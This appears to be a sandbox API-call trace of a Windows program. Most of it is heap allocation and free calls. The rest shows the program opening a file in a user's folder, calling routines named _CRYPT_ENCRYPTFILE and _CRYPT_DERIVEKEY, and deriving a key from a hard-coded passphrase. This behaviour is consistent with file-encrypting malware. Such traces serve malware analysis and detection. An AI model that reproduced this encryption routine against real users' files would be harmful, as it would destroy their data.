1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0108.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\du9vqvjn.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0108.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0108.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.313] FreeLibrary (hLibModule=0x772d0000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0108.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.314] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.314] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.315] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0108.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0108.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0108.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0108.317] CloseHandle (hObject=0x298) returned 1 [0108.317] FreeLibrary (hLibModule=0x772d0000) returned 1 [0108.317] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0108.317] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\DU9VQvjn.swf", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a8b2c0, ftCreationTime.dwHighDateTime=0x1d5e85a, ftLastAccessTime.dwLowDateTime=0x5dbb9c00, ftLastAccessTime.dwHighDateTime=0x1d5e858, ftLastWriteTime.dwLowDateTime=0x5dbb9c00, ftLastWriteTime.dwHighDateTime=0x1d5e858, nFileSizeHigh=0x0, nFileSizeLow=0x135eb, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="DU9VQvjn.swf", cAlternateFileName="")) returned 0x41ac280 [0108.317] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0108.317] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0108.317] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0108.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.318] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0108.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0108.318] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0108.318] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0108.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0108.319] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0108.319] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0108.319] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.319] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0108.319] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.319] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0108.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0108.319] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0108.319] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0108.319] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0108.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0108.319] CryptHashData (hHash=0x41ac040, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0108.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 